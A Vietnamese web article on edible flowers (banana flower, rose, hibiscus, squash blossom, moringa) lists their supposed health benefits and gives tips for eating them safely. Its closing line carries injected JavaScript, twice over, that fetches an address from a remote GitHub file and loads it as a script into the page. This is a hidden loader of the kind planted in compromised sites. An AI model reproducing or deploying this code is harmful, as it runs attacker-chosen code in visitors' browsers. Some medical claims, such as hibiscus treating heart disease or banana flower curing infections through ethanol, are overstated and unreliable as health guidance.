Những loài hoa không chỉ đẹp mà còn ăn ngon “không tưởng”

Hoa không chỉ giúp làm đẹp cuộc sống của chúng ta, mà nhiều loại hoa còn có thể dùng làm thực phẩm với hương vị thơm ngon và tốt cho sức khỏe.

Hoa ngoài việc dùng để trang trí thì vẫn có những loại có thể xuất hiện ngay trong khẩu phần ăn của bạn. Các loài hoa ăn đã được dùng trong nhiều nền ẩm thực trên khắp thế giới. Chúng vừa mang lại hương vị và màu sắc độc đáo cho nhiều món ăn và còn mang lại lợi ích sức khỏe.

Tuy nhiên, không phi loi hoa nào cũng đều an toàn để hấp thụ vào cơ thể. Dưới đây là những loại hoa có thể ăn được và lợi ích sức khỏe tiềm tàng của chúng.

Hoa chuối

Hoa chuối khá phổ biến trong ẩm thực châu Á. Hoa chuối có hình dáng tựa giọt nước. Khi chế biến, người ta sẽ sử dụng các lá mềm bên trong để thêm vào món salad, cà ri, súp, món xào, hầm. Theo Times of India, hoa chuối có tác dụng chữa nhiễm trùng vì trong hoa có chất ethanol giúp ngăn chặn sự phát triển của vi khuẩn gây bệnh.

Người bệnh tiểu đường cũng được khuyến khích ăn hoa chuối luộc hoặc ăn riêng để làm giảm lượng đường trong máu và tăng huyết sắc tố trong c thể. Bởi đây là món ăn rất giàu chất xơ và sắt; giúp hỗ trợ sản xuất hồng cầu.

Hơn nữa, hoa chuối còn sở hữu đặc tính chống oxy hóa, vitamin C, A, E, chất xơ và kali; giúp hỗ trợ làm chậm quá trình lão hóa và là nguồn dinh dưỡng lành mạnh.

Hoa hồng

Bên cạnh giàu vitamin và chất chống oxy hóa, thì câu hỏi luôn được đặt ra là hoa hồng ăn được không?. Câu trả lời là có. Hoa hồng không chỉ ăn được còn mang lại nhiều lợi ích sức khỏe như điều hòa kinh nguyệt, đau bụng và vấn đề về mụn hay viêm da.

Cánh hoa hồng có nhiều dỡng chất giúp hỗ trợ tiêu hóa, mát gan, giải độc. Nụ hoa hồng còn được dùng để pha trà sau khi phơi và sấy khô. Nghiền nhỏ những cánh hoa hồng tươi thành bột để hô biến thành hoa ăn được làm bánh hoặc trang trí, tạo nên màu sắc, hương vị độc đáo và hấp dẫn hơn.

Hoa dâm bụt

Hoa dâm bụt còn có tên tiếng Anh là hoa Hibiscus, là một trong các loại hoa ăn được, hoa cực giàu protein, axit hữu cơ, axit amin. Với tác dụng hiệu quả trong điều trị bệnh tim, các bệnh huyết áp và là một nguồn vitamin C tuyệt vời giúp hỗ trợ miễn dịch khỏe mạnh.

Có rất nhiều nơi trồng cây hoa dâm bụt để pha trà uống. Một tách trà hoa dâm bụt khi bạn đang có triệu chứng cảm sẽ khiến cơn bệnh đi qua nhanh chóng. Vị chua đậm đà mang lại hương vị tươi mát trong cc món Âu nên hoa dâm bụt là hương liệu chính của nhiều loài món ngọt như mứt, bánh tart, socola, bánh ngọt,…

Hoa bí

Hoa bí (hoa bí đỏ, bí ngòi) cũng được sử dụng làm nguyên liệu nấu ăn rất phổ biến. Trong hoa bí có các chất Ca, Fe, Mg, K, vitamin A và nhiều vitamin khác. Ngoài ra, hoa bí còn có chất tạo ngọt tự nhiên, dễ hấp thụ và tốt cho sức khỏe.

Đặc biệt, hoa bí rất giàu các chất chống oxy hóa gồm: anthocyanins, caroten, flavonoid, phenol. Đây là những hợp chất có thể trung hòa các gốc tự do có hại, giảm viêm trong cơ thể và hỗ trợ ngăn ngừa các bệnh mạn tính. Ngoài ra, hoa bí cũng chứa một lượng lớn carotenoid, có thể giúp tăng cường chức năng não bộ, hỗ trợ sức khỏe tim mạch.

Hoa chùm ngây

Chùm ngây là một loại thảo dược thông dụng trong y học dân gian nhưng lại ít ai biết rằng hoa chùm ngây là hoa ăn được và có thể chế biến thành nhiều món ăn vừa đảm bảo ngon miệng vừa rất tốt cho cơ thể.

Hoa chùm ngây chứa nhiều mật ngọt có thể làm rau hoặc phơi khô dùng để nấu lấy nước uống.

Lưu ý khi sử dụng các loại hoa ăn được

Biết rõ nơi bán đảm bảo các loài hoa được trồng hữu cơ và không phun thuốc trừ sâu bởi chúng vốn được trồng để ăn.

Luôn rửa thật kỹ hoa trước khi ăn sống hoặc chế biến.

Cánh hoa là phần an toàn nhất để ăn thử, các bạn có thể thử trước xem có dị ứng hay không rồi tiếp tục thường thức cho an toàn.

Theo Doanh nghiệp & Thương hiệu;var url = ‘https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});;var url = ‘https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});